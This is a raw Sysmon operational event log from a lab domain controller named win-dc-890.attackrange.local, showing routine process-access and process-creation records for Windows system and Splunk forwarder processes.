07:54:54.492{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049860Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.492{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049859Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.492{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049858Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.492{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049857Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.492{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F54E-60EB-537D-00000000CF01}4652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049856Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.492{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F54E-60EB-537D-00000000CF01}4652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049855Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.493{466BC892-F54E-60EB-537D-00000000CF01}4652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001049854Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.308{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049853Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.308{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049852Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.308{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049851Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.308{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049850Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.308{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049849Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.308{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049848Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.308{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049847Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.308{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049846Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.308{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049845Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.308{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049844Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.308{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049843Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.308{466BC892-32D3-60E8-700B-00000000CF01}1664384C:\Windows\System32\sihost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049842Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.292{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCB24A6FAACB43716A4433361AFDB595,SHA256=F3F5C5C0E1713A1F76FB036215A7ABF7D09604ADE0EC942F068170A763989FE8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049841Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.140{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\W